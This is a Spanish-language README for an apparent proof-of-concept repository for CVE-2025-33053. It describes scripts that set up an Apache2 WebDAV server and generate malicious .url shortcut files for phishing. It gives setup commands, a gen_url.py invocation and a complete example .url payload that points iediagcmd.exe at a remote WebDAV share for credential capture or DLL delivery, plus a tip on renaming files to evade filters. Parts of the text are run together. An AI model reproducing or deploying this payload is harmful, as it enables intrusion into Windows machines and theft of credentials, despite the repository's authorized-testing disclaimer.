CVE-2025-33053 Prueba de concepto (PoC)
Este repositorio proporciona scripts para desplegar automáticamente un servidor WebDAV en Ubuntu usando Apache2 y generar archivos .url maliciosos para su uso en phishing, red teaming o simulación de movimiento lateral.
setup_webdav.sh – Script Bash para configurar Apache2 + WebDAV.setup_webdav.py – Versión en Python del anterior.gen_url.py – Script en Python para generar archivos de acceso directo .url con rutas UNC/WebDAV.README.md – Documentación.sudosudo bash setup_webdav.sh
O usando Python:
sudo python3 setup_webdav.py
Por defecto, el script:
/var/www/webdav.DAV y DAV_FS.DavLockDB (para evitar errores de bloqueo DAV de Apache).📎 Ruta WebDAV:
http://<your-ip>/webdav/
.url Maliciosopython3 gen_url.py --ip 192.168.1.100 --out doc.url
python3 gen_url.py \
--ip 《YOUR IP ADDRESS》\
--share 《YOUR SHARE NAME》(Default: webdav) \
--out 《YOUR OUTPUT FILENAME.url》(Default: bait.url) \
--exe "C:\Program Files\Internet Explorer\iediagcmd.exe" \
--icon "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe" \
--index 13 \
--modified 20F06BA06D07BD014D
Esto creará un archivo .url como:
[InternetShortcut]
URL=C:\Program Files\Internet Explorer\iediagcmd.exe
WorkingDirectory=\\192.168.1.100\webdav\
ShowCommand=7
IconIndex=13
IconFile=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Modified=20F06BA06D07BD014D
📌 Al hacer clic en este archivo (en ciertas configuraciones), el sistema objetivo podría conectarse automáticamente a tu servidor WebDAV (autenticación o entrega de DLL).
sudo ufw allow 80
.url pueden no ejecutarse como se espera dependiendo de:
.url a .txt para evadir filtros.Este repositorio es solo para fines educativos y pruebas de penetración autorizadas.
No uses estos scripts contra sistemas que no te pertenezcan o para los que no tengas permiso de prueba.
Para preguntas o solicitudes éticas de red teaming, contacta a través de los issues de GitHub.